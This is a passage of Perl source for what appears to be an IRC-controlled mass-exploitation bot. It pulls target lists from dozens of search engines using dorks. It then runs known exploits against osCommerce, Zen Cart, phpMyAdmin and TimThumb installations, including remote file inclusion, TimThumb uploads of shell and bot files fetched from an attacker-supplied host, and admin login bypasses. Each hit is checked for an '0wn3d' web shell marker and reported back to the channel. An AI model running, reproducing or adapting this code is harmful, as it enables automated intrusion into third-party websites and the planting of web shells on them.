  666.                 if ($path =~ $channel && $msg=~ /^$oscocmd\s+(.*)/) {
  667.                     if (my $pid = fork) {
  668.                         waitpid($pid, 0);
  669.                     }
  670.                     else {
  671.                         if (fork) { exit; } else {
  672.                             my ($bug0,$dork) = ("admin/categories.php/login.php",$1);
  673.                                                         my ($bug1,$dork) = ("admin/file_manager.php/login.php",$1);
  674.                                                         my ($bug2,$dork) = ("admin/banner_manager.php/login.php",$1);
  675.                                                         my ($bug3,$dork) = ("admin/categories.php/login.php?cPath=&action=new_product_preview",$1);
  676.                                                         &msg("$path","$oscologo 13Dork :9 $dork ");
  677.                             &msg("$path","$oscologo 4==14L4=15O4=0A4=0D4=0I4=15N4=14G4== ");
  678.                             &scan_start($path,$bug0,$dork,$engine,6);sleep(1);
  679.                                                         &scan_start($path,$bug1,$dork,$engine,7);sleep(1);
  680.                                                         &scan_start($path,$bug2,$dork,$engine,13);sleep(1);
  681.                                                         &scan_start($path,$bug3,$dork,$engine,15);
  682.                         }
  683.                         exit;
  684.                     }
  685.                 }
  686.                                 ##################################################################### DOMOSCO SCAN
  687.                                 if ($path =~ $channel && $msg=~ /^!domosco\s+(.*)/) {
  688.                                         if (my $pid = fork) {
  689.                                                 waitpid($pid, 0);
  690.                                         }
  691.                                         else {
  692.                                                 foreach my $domends (@domen) { $domens = $domen[rand(scalar(@domen))];
  693.                                                         if (fork) { exit; } else {
  694.                                                                 my ($bug0,$dork) = ("admin/categories.php/login.php","".$1." site:.".$domens);
  695.                                                                 my ($bug1,$dork) = ("admin/file_manager.php/login.php","".$1." site:.".$domens);
  696.                                                                 my ($bug2,$dork) = ("admin/banner_manager.php/login.php","".$1." site:.".$domens);
  697.                                                                 my ($bug3,$dork) = ("admin/categories.php/login.php?cPath=&action=new_product_preview","".$1." site:.".$domens);
  698.                                                                 &msg("$path","$oscologo 13Dork:9 $dork ");
  699.                                                                 &msg("$path","$oscologo 4==14L4=15O4=0A4=0D4=0I4=15N4=14G4== ");
  700.                                                                 &scan_start($path,$bug0,$dork,$engine,6);sleep(1);
  701.                                                                 &scan_start($path,$bug1,$dork,$engine,7);sleep(1);
  702.                                                                 &scan_start($path,$bug2,$dork,$engine,13);sleep(1);
  703.                                                                 &scan_start($path,$bug3,$dork,$engine,15);
  704.                                                         }
  705.                                                 exit;
  706.                                                 }
  707.                     }
  708.                 }
  709.                 ##################################################################### CPANEL SCAN
  710.                                         if ($path =~ $channel && $msg=~ /^$cpancmd\s+(.*)/) {
  711.                                                 if (my $pid = fork) { waitpid($pid, 0); } else {
  712.                                                         if (fork) { exit; } else {
  713.                                                                         my ($bug,$dork) = ("admin/content.php?act=tambahuser",$1);
  714.                                                                         &msg("$path","$cpanlogo 13Dork :9 $dork");
  715.                                                                         &msg("$path","$cpanlogo 7==14L7=15O7=0A7=0D7=0I7=15N7=14G7== ");
  716.                                                                         &scan_start($path,$bug,$dork,$engine,8);
  717.                                                                                                                
  718.                                                         }
  719.                                                         exit;
  720.                                         }
  721.                                 }
  722.                                 if ($path =~ $channel && $msg=~ /^$cpancmd\s+(.*)/) {
  723.                                                 if (my $pid = fork) { waitpid($pid, 0); } else {
  724.                                                         if (fork) { exit; } else {
  725.                                                                         my ($bug,$dork) = ("admin/content.php?module=user",$1);
  726.                                                                         &scan_start($path,$bug,$dork,$engine,9);
  727.                                                                                                                
  728.                                                         }
  729.                                                         exit;
  730.                                         }
  731.                                 }
  732.                                 ##################################################################### PhpMyAdmin SCAN
  733.                                 if ($path =~ $channel && $msg=~ /^$admcmd\s+(.*)/) {
  734.                     if (my $pid = fork) {
  735.                         waitpid($pid, 0);
  736.                     }
  737.                     else {
  738.                         if (fork) { exit; } else {
  739.                             my ($bug,$dork) = ("phpMyAdmin/config/config.inc.php",$1);
  740.                             &msg("$path","$admlogo 13Dork :9 $dork");
  741.                             &msg("$path","$admlogo 11==14L11=15O11=0A11=0D11=0I11=15N11=14G11==");
  742.                             &scan_start($path,$bug,$dork,$engine,10);
  743.                         }
  744.                         exit;
  745.                     }
  746.                 }
  747.                ##################################################################### OPENCART SCAN
  748.                 if ($path =~ $channel && $msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {
  749.                     if (my $pid = fork) {
  750.                         waitpid($pid, 0);
  751.                     }
  752.                     else {
  753.                         if (fork) { exit; } else {
  754.                             my ($bug,$dork) = ($1,$2);
  755.                             &msg("$path","$oplogo 3Dork :4 $dork");
  756.                             &msg("$path","$oplogo 6Bugz :4 $bug");
  757.                             &msg("$path","$oplogo 12Search Engine Loading ...");
  758.                             &scan_start($path,$bug,$dork,$engine,11);
  759.                         }
  760.                         exit;
  761.                     }
  762.                 }
  763.                 ##################################################################### ZEN SCAN
  764.                 if ($path =~ $channel && $msg=~ /^$zencmd\s+(.*)/) {
  765.                     if (my $pid = fork) {
  766.                         waitpid($pid, 0);
  767.                     }
  768.                     else {
  769.                         if (fork) { exit; } else {
  770.                             my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
  771.                             &msg("$path","$zenlogo 3Dork :4 $dork");
  772.                             &msg("$path","$zenlogo 12Search Engine Loading ...");
  773.                             &scan_start($path,$bug,$dork,$engine,12);
  774.                         }
  775.                         exit;
  776.                     }
  777.                 }
  778.                 ##################################################################### ZEN SCAN
  779.                 if ($path =~ $channel && $msg=~ /^$zencmd\s+(.*)/) {
  780.                     if (my $pid = fork) {
  781.                         waitpid($pid, 0);
  782.                     }
  783.                     else {
  784.                         if (fork) { exit; } else {
  785.                             my ($bug,$dork) = ("admin/record_company.php",$1);
  786.                             &scan_start($path,$bug,$dork,$engine,12);
  787.                         }
  788.                         exit;
  789.                     }
  790.                 }
  791.                                 #####################################################################
  792.             }
  793.         }
  794.  
  795.         for(my $c=0; $c<= $#lines; $c++) {
  796.             $line = $lines[$c];
  797.             $line = $line_temp.$line if ($line_temp);
  798.             $line_temp = '';
  799.             $line =~ s/\r$//;
  800.             unless ($c == $#lines) {
  801.                 &parse("$line");
  802.             } else {
  803.                 if ($#lines == 0) {
  804.                     &parse("$line");
  805.                 } elsif ($lines[$c] =~ /\r$/) {
  806.                     &parse("$line");
  807.                 } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  808.                     &parse("$line");
  809.                 } else {
  810.                     $line_temp = $line;
  811.                 }
  812.             }
  813.         }
  814.     }
  815. }
  816.  
  817. #########################################
  818. sub type () {
  819. my ($chan,$bug,$dork,$engine,$type) = @_;
  820.         if ($type == 1){$type=&rfi($chan,$bug,$dork,$engine);}
  821.         elsif ($type == 2){$type=&lfi($chan,$bug,$dork,$engine);}
  822.         elsif ($type == 3){$type=&e107($chan,$bug,$dork,$engine);}
  823.         elsif ($type == 4){$type=&xml($chan,$bug,$dork,$engine);}
  824.         elsif ($type == 5){$type=&sql($chan,$bug,$dork,$engine);}
  825.         elsif ($type == 6){$type=&osco($chan,$bug,$dork,$engine);}
  826.         elsif ($type == 7){$type=&osco2($chan,$bug,$dork,$engine);}
  827.         elsif ($type == 8){$type=&cpanel($chan,$bug,$dork,$engine);}
  828.         elsif ($type == 9){$type=&cpanel2($chan,$bug,$dork,$engine);}
  829.         elsif ($type == 10){$type=&adm($chan,$bug,$dork,$engine);}
  830.         elsif ($type == 11){$type=&op($chan,$bug,$dork,$engine);}
  831.         elsif ($type == 12){$type=&zen($chan,$bug,$dork,$engine);}
  832.         elsif ($type == 13){$type=&osco3($chan,$bug,$dork,$engine);}
  833.         elsif ($type == 14){$type=&lfd($chan,$bug,$dork,$engine);}
  834.         elsif ($type == 15){$type=&osco4($chan,$bug,$dork,$engine);}
  835.         elsif ($type == 16){$type=&timrfi($chan,$bug,$dork,$engine);}
  836.         elsif ($type == 17){$type=&PmWiki($chan,$bug,$dork,$engine);}
  837. }
  838. sub scan_start() {
  839. my ($chan,$bug,$dork,$engine,$type) = @_;
  840.     if ($engine =~ /google/i) {
  841.         if (my $pid = fork) { waitpid($pid, 0); }
  842.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Google",$type); } exit; }
  843.     }
  844.     if ($engine =~ /google2/i) {
  845.         if ($pid = fork) { waitpid($pid, 0); }
  846.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Google2",$type); } exit; }
  847.     }
  848.         if ($engine =~ /gigablast/i) {
  849.         if ($pid = fork) { waitpid($pid, 0); }
  850.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GigaBlast",$type); } exit; }
  851.     }
  852.         if ($engine =~ /euroseek/i) {
  853.         if ($pid = fork) { waitpid($pid, 0); }
  854.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EuroSeek",$type); } exit; }
  855.     }
  856.         if ($engine =~ /alltheweb/i) {
  857.         if ($pid = fork) { waitpid($pid, 0); }
  858.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Alltheweb",$type); } exit; }
  859.     }
  860.     if ($engine =~ /bing/i) {
  861.         if ($pid = fork) { waitpid($pid, 0); }
  862.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bing",$type); } exit; }
  863.     }
  864.     if ($engine =~ /altavista/i) {
  865.         if ($pid = fork) { waitpid($pid, 0); }
  866.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Altavista",$type); } exit; }
  867.     }
  868.     if ($engine =~ /ask/i) {
  869.         if ($pid = fork) { waitpid($pid, 0); }
  870.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ask",$type); } exit; }
  871.     }
  872.     if ($engine =~ /uol/i) {
  873.         if ($pid = fork) { waitpid($pid, 0); }
  874.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uol",$type); } exit; }
  875.     }
  876.     if ($engine =~ /yahoo/i) {
  877.         if ($pid = fork) { waitpid($pid, 0); }
  878.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yahoo",$type); } exit; }
  879.     }
  880.         if ($engine =~ /yahoo2/i) {
  881.         if ($pid = fork) { waitpid($pid, 0); }
  882.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yahoo2",$type); } exit; }
  883.     }
  884.     if ($engine =~ /clusty/i) {
  885.         if ($pid = fork) { waitpid($pid, 0); }
  886.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Clusty",$type); } exit; }
  887.     }
  888.     if ($engine =~ /gutser/i) {
  889.         if ($pid = fork) { waitpid($pid, 0); }
  890.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Gutser",$type); } exit; }
  891.     }
  892.     if ($engine =~ /rediff/i) {
  893.         if ($pid = fork) { waitpid($pid, 0); }
  894.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Rediff",$type); } exit; }
  895.     }
  896.         if ($engine =~ /mamma/i) {
  897.         if ($pid = fork) { waitpid($pid, 0); }
  898.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mamma",$type); } exit; }
  899.     }
  900.     if ($engine =~ /virgilio/i) {
  901.         if ($pid = fork) { waitpid($pid, 0); }
  902.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Virgilio",$type); } exit; }
  903.     }
  904.     if ($engine =~ /webde/i) {
  905.         if ($pid = fork) { waitpid($pid, 0); }
  906.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Webde",$type); } exit; }
  907.     }
  908.     if ($engine =~ /exalead/i) {
  909.         if ($pid = fork) { waitpid($pid, 0); }
  910.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Exalead",$type); } exit; }
  911.     }
  912.     if ($engine =~ /lycos/i) {
  913.         if ($pid = fork) { waitpid($pid, 0); }
  914.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Lycos",$type); } exit; }
  915.     }
  916.     if ($engine =~ /hotbot/i) {
  917.         if ($pid = fork) { waitpid($pid, 0); }
  918.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Hotbot",$type); } exit; }
  919.     }
  920.     if ($engine =~ /aol/i) {
  921.         if ($pid = fork) { waitpid($pid, 0); }
  922.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Aol",$type); } exit; }
  923.     }
  924.     if ($engine =~ /sapo/i) {
  925.         if ($pid = fork) { waitpid($pid, 0); }
  926.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sapo",$type); } exit; }
  927.     }
  928.     if ($engine =~ /duck/i) {
  929.         if ($pid = fork) { waitpid($pid, 0); }
  930.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Duck",$type); } exit; }
  931.     }
  932.     if ($engine =~ /yause/i) {
  933.         if ($pid = fork) { waitpid($pid, 0); }
  934.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yause",$type); } exit; }
  935.     }
  936.     if ($engine =~ /baidu/i) {
  937.         if ($pid = fork) { waitpid($pid, 0); }
  938.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Baidu",$type); } exit; }
  939.     }
  940.     if ($engine =~ /black/i) {
  941.         if ($pid = fork) { waitpid($pid, 0); }
  942.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Black",$type); } exit; }
  943.     }
  944.         if ($engine =~ /onet/i) {
  945.         if ($pid = fork) { waitpid($pid, 0); }
  946.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Onet",$type); } exit; }
  947.     }
  948.         if ($engine =~ /sizuka/i) {
  949.         if ($pid = fork) { waitpid($pid, 0); }
  950.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sizuka",$type); } exit; }
  951.     }
  952.         if ($engine =~ /walla/i) {
  953.         if ($pid = fork) { waitpid($pid, 0); }
  954.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Walla",$type); } exit; }
  955.     }
  956.         if ($engine =~ /demos/i) {
  957.         if ($pid = fork) { waitpid($pid, 0); }
  958.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Demos",$type); } exit; }
  959.     }
  960.         if ($engine =~ /rose/i) {
  961.         if ($pid = fork) { waitpid($pid, 0); }
  962.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Rose",$type); } exit; }
  963.     }
  964.         if ($engine =~ /seznam/i) {
  965.         if ($pid = fork) { waitpid($pid, 0); }
  966.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Seznam",$type); } exit; }
  967.     }
  968.         if ($engine =~ /tiscali/i) {
  969.         if ($pid = fork) { waitpid($pid, 0); }
  970.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tiscali",$type); } exit; }
  971.     }
  972.         if ($engine =~ /naver/i) {
  973.         if ($pid = fork) { waitpid($pid, 0); }
  974.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Naver",$type); } exit; }
  975.     }  
  976.         if ($engine =~ /amidalla/i) {
  977.         if ($pid = fork) { waitpid($pid, 0); }
  978.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AmiDalLa",$type); } exit; }
  979.     }
  980.         if ($engine =~ /buscar/i) {
  981.         if ($pid = fork) { waitpid($pid, 0); }
  982.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BusCaR",$type); } exit; }
  983.     }
  984.         if ($engine =~ /kvasir/i) {
  985.         if ($pid = fork) { waitpid($pid, 0); }
  986.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"KvaSiR",$type); } exit; }
  987.     }
  988.         if ($engine =~ /excite/i) {
  989.         if ($pid = fork) { waitpid($pid, 0); }
  990.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"eXciTe",$type); } exit; }
  991.     }
  992.         if ($engine =~ /interia/i) {
  993.         if ($pid = fork) { waitpid($pid, 0); }
  994.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"InteRia",$type); } exit; }
  995.     }
  996.         if ($engine =~ /snz/i) {
  997.         if ($pid = fork) { waitpid($pid, 0); }
  998.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SnZ",$type); } exit; }
  999.     }
  1000.         if ($engine =~ /rambler/i) {
  1001.         if ($pid = fork) { waitpid($pid, 0); }
  1002.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"RambLer",$type); } exit; }
  1003.     }  
  1004.         if ($engine =~ /yandex/i) {
  1005.         if ($pid = fork) { waitpid($pid, 0); }
  1006.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"YaNdeX",$type); } exit; }
  1007.     }
  1008.         ###### NIEUWE ######
  1009.         if ($engine =~ /netsprint/i) {
  1010.         if ($pid = fork) { waitpid($pid, 0); }
  1011.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NetSprint",$type); } exit; }
  1012.     }
  1013.         if ($engine =~ /saol/i) {
  1014.         if ($pid = fork) { waitpid($pid, 0); }
  1015.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"sAol",$type); } exit; }
  1016.     }
  1017.         if ($engine =~ /lookle/i) {
  1018.                 if ($pid = fork) { waitpid($pid, 0); }
  1019.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Lookle",$type); } exit; }
  1020.         }
  1021.         if ($engine =~ /optuszoo/i) {
  1022.                 if ($pid = fork) { waitpid($pid, 0); }
  1023.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"optusZoo",$type); } exit; }
  1024.         }
  1025.         if ($engine =~ /search66/i) {
  1026.                 if ($pid = fork) { waitpid($pid, 0); }
  1027.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Search66",$type); } exit; }
  1028.         }
  1029.         if ($engine =~ /arrama/i) {
  1030.         if ($pid = fork) { waitpid($pid, 0); }
  1031.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Arrama",$type); } exit; }
  1032.     }
  1033.         if ($engine =~ /excitejp/i) {
  1034.         if ($pid = fork) { waitpid($pid, 0); }
  1035.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"eXciteJP",$type); } exit; }
  1036.     }
  1037.         if ($engine =~ /biglobe/i) {
  1038.         if ($pid = fork) { waitpid($pid, 0); }
  1039.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BigLobe",$type); } exit; }
  1040.     }
  1041.         if ($engine =~ /clix/i) {
  1042.         if ($pid = fork) { waitpid($pid, 0); }
  1043.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Clix",$type); } exit; }
  1044.     }
  1045.         if ($engine =~ /searchch/i) {
  1046.         if ($pid = fork) { waitpid($pid, 0); }
  1047.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SearchCH",$type); } exit; }
  1048.     }
  1049.         if ($engine =~ /cada/i) {
  1050.                 if ($pid = fork) { waitpid($pid, 0); }
  1051.                 else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cada",$type); } exit; }
  1052.         }
  1053.         ####################
  1054. }
  1055. #########################################
  1056. sub rfi() {
  1057.         my ($chan,$bug,$dork,$engine) = @_;
  1058.     my $count = 0;
  1059.     my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
  1060.     my $num = scalar(@list);
  1061.     if ($num > 0) {
  1062.         foreach my $site (@list) {
  1063.             $count++;
  1064.                                 if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$rfilogo 12(4@0$engine12) 9==14F9=15I9=0N9=0I9=0S9=14H9=="); } }
  1065.                                 my $coba = "http://".$site.$bug.$injector;
  1066.                                 my $test = "http://".$site.$bug;
  1067.                                 my $cek  = &get_content($test);sleep(1);
  1068.                                 &get_content($coba);sleep(1);
  1069.                                 if ($cek =~ /failed to open stream/i) {
  1070.                                         &rfi_xpl($test,$chan,$site,$engine);
  1071.                                 }
  1072.                 }
  1073.         }
  1074. }
  1075.  
  1076. sub rfi_xpl() {
  1077. my $url    = $_[0];
  1078. my $chan   = $_[1];
  1079. my $site   = $_[2];
  1080. my $engine = $_[3];
  1081. my $dor  = $url.$botshell."?";
  1082. my $test = $url.$injector."?";
  1083. my $check = &get_content($dor);
  1084.             &get_content($test);sleep(1);
  1085.                         if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/i) {
  1086.                         &info_main($dor,$chan,$engine,$rfilogo);
  1087.                 }
  1088. }
  1089.  
  1090. ######################## timrfi
  1091. sub timrfi() {
  1092.      my $chan = $_[0];
  1093.      my $bug = $_[1];
  1094.      my $dork = $_[2];
  1095.      my $engine = $_[3];
  1096.      my $count = 0;
  1097.      my @list = search_engine($chan,$bug,$dork,$engine,$timlogo);
  1098.      my $num = scalar(@list);
  1099.      if ($num > 0) {
  1100.          foreach my $site (@list) {
  1101.              $count++;
  1102.              if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$timlogo 12(4@0$engine12) 9==14F9=15I9=0N9=0I9=0S9=14H9=="); } }
  1103.                                 my $vuln = "http://".$site.$bug;
  1104.                                 my @dirs = ("functions","functions/scripts","functions/timthumb","framework/includes","framework/thumb",
  1105.                                                         "scripts","scripts/timthumb","scripts/thumb","lib","lib/script","lib/thumb","lib/timthumb",
  1106.                                                         "inc","includes","includes/thumb","includes/timthumb","library","library/thumb",
  1107.                                                         "library/resource","library/timthumb","library/functions","modules","images","phpthumb",
  1108.                                                         "layouts","phpThumb","thumb","timThumb","timthumb","tools","tools/timthumb","tools/thumb","options","js","");
  1109.                                 foreach my $dir (@dirs) {
  1110.                                
  1111.                                         my $testsha = "http://".$site.$bug.$dir."/timthumb.php?src=".$blog."sh.php";           
  1112.                                         my $testbta = "http://".$site.$bug.$dir."/timthumb.php?src=".$blog."index.php";
  1113.                                                
  1114.                                         my $htmla  = &get_content($testsha); &get_content($testbta); sleep(3);
  1115.                                         if ($htmla =~ /Unable to open image/i ) {
  1116.                                         &tim_xpla0($vuln,$dir,$blog,$chan,$site,$engine);
  1117.                                         &tim_xplb0($vuln,$dir,$blog,$chan,$site,$engine);
  1118.                                         &tim_xplc0($vuln,$dir,$blog,$chan,$site,$engine);
  1119.                                         &tim_xpld0($vuln,$dir,$blog,$chan,$site,$engine);
  1120.  
  1121.                                         &tim_xpla1($vuln,$blog,$chan,$site,$engine); &tim_xplb1($vuln,$blog,$chan,$site,$engine); &tim_xplc1($vuln,$blog,$chan,$site,$engine); &tim_xpld1($vuln,$blog,$chan,$site,$engine);
  1122.                                         &tim_xpla2($vuln,$blog,$chan,$site,$engine); &tim_xplb2($vuln,$blog,$chan,$site,$engine); &tim_xplc2($vuln,$blog,$chan,$site,$engine); &tim_xpld2($vuln,$blog,$chan,$site,$engine);
  1123.                                         }
  1124.                                 }
  1125.                                 foreach my $dir (@dirs) {
  1126.                                
  1127.                                         my $testshb = "http://".$site.$bug.$dir."/thumb.php?src=".$blog."sh.php";              
  1128.                                         my $testbtb = "http://".$site.$bug.$dir."/thumb.php?src=".$blog."index.php";
  1129.                                                
  1130.                                         my $htmlb  = &get_content($testshb); &get_content($testbtb); sleep(3);
  1131.                                         if ($htmlb =~ /Unable to open image/i ) {
  1132.                                         &tim_xpla0($vuln,$dir,$blog,$chan,$site,$engine);
  1133.                                         &tim_xplb0($vuln,$dir,$blog,$chan,$site,$engine);
  1134.                                         &tim_xplc0($vuln,$dir,$blog,$chan,$site,$engine);
  1135.                                         &tim_xpld0($vuln,$dir,$blog,$chan,$site,$engine);
  1136.  
  1137.                                         &tim_xpla1($vuln,$blog,$chan,$site,$engine); &tim_xplb1($vuln,$blog,$chan,$site,$engine); &tim_xplc1($vuln,$blog,$chan,$site,$engine); &tim_xpld1($vuln,$blog,$chan,$site,$engine);
  1138.                                         &tim_xpla2($vuln,$blog,$chan,$site,$engine); &tim_xplb2($vuln,$blog,$chan,$site,$engine); &tim_xplc2($vuln,$blog,$chan,$site,$engine); &tim_xpld2($vuln,$blog,$chan,$site,$engine);
  1139.                                         }
  1140.                                 }
  1141.                                 foreach my $dir (@dirs) {
  1142.                                
  1143.                                         my $testshb = "http://".$site.$bug.$dir."/phpThumb.php?src=".$blog."sh.php";           
  1144.                                         my $testbtb = "http://".$site.$bug.$dir."/phpThumb.php?src=".$blog."index.php";
  1145.                                                
  1146.                                         my $htmlb  = &get_content($testshb); &get_content($testbtb); sleep(3);
  1147.                                         if ($htmlb =~ /Unable to open image/i ) {
  1148.                                         &tim_xpla0($vuln,$dir,$blog,$chan,$site,$engine);
  1149.                                         &tim_xplb0($vuln,$dir,$blog,$chan,$site,$engine);
  1150.                                         &tim_xplc0($vuln,$dir,$blog,$chan,$site,$engine);
  1151.                                         &tim_xpld0($vuln,$dir,$blog,$chan,$site,$engine);
  1152.  
  1153.                                         &tim_xpla1($vuln,$blog,$chan,$site,$engine); &tim_xplb1($vuln,$blog,$chan,$site,$engine); &tim_xplc1($vuln,$blog,$chan,$site,$engine); &tim_xpld1($vuln,$blog,$chan,$site,$engine);
  1154.                                         &tim_xpla2($vuln,$blog,$chan,$site,$engine); &tim_xplb2($vuln,$blog,$chan,$site,$engine); &tim_xplc2($vuln,$blog,$chan,$site,$engine); &tim_xpld2($vuln,$blog,$chan,$site,$engine);
  1155.                                         }
  1156.                                 }
  1157.                         }
  1158.         #       exit;
  1159.         }
  1160.  }
  1161. # dirs getted from engine #
  1162. sub tim_xpla0() {
  1163.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1164.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."cache/external_".md5_hex($shell).".php";
  1165.         my $dur = $url.$dir."cache/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1166.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1167.                
  1168. sub tim_xplb0() {
  1169.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1170.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."cache/".md5_hex($shell).".php";
  1171.         my $dur = $url.$dir."cache/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1172.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1173.                
  1174. sub tim_xplc0() {
  1175.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1176.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."temp/external_".md5_hex($shell).".php";
  1177.         my $dur = $url.$dir."temp/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1178.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1179.  
  1180. sub tim_xpld0() {
  1181.         my($url,$dir,$mode,$chan,$site,$engine) = @_;
  1182.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url.$dir."temp/".md5_hex($shell).".php";
  1183.         my $dur = $url.$dir."temp/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1184.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1185.  
  1186. # /
  1187. sub tim_xpla1() {
  1188.         my($url,$mode,$chan,$site,$engine) = @_;
  1189.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."cache/external_".md5_hex($shell).".php";
  1190.         my $dur = $url."cache/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1191.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1192.                
  1193. sub tim_xplb1() {
  1194.         my($url,$mode,$chan,$site,$engine) = @_;
  1195.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."cache/".md5_hex($shell).".php";
  1196.         my $dur = $url."cache/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1197.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1198.                
  1199. sub tim_xplc1() {
  1200.         my($url,$mode,$chan,$site,$engine) = @_;
  1201.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."temp/external_".md5_hex($shell).".php";
  1202.         my $dur = $url."temp/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1203.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1204.  
  1205. sub tim_xpld1() {
  1206.         my($url,$mode,$chan,$site,$engine) = @_;
  1207.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."temp/".md5_hex($shell).".php";
  1208.         my $dur = $url."temp/".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1209.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1210.  
  1211. # /uploads/thumb-temp/
  1212. sub tim_xpla2() {
  1213.         my($url,$mode,$chan,$site,$engine) = @_;
  1214.         my $shell = $mode."sh.php"; my $bot = $mode."index.php"; my $dor = $url."wp-content/uploads/thumb-temp/external_".md5_hex($shell).".php";
  1215.         my $dur = $url."wp-content/uploads/thumb-temp/external_".md5_hex($bot).".php"; my $check = &get_content($dor); &get_content($dur); sleep(1);
  1216.                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) { &info_main($dor,$chan,$engine,$timlogo); } }
  1217.                
  1218. sub tim_xplb2() {
  1219.         my($url,$mode,$chan,$site,$engine) = @_;
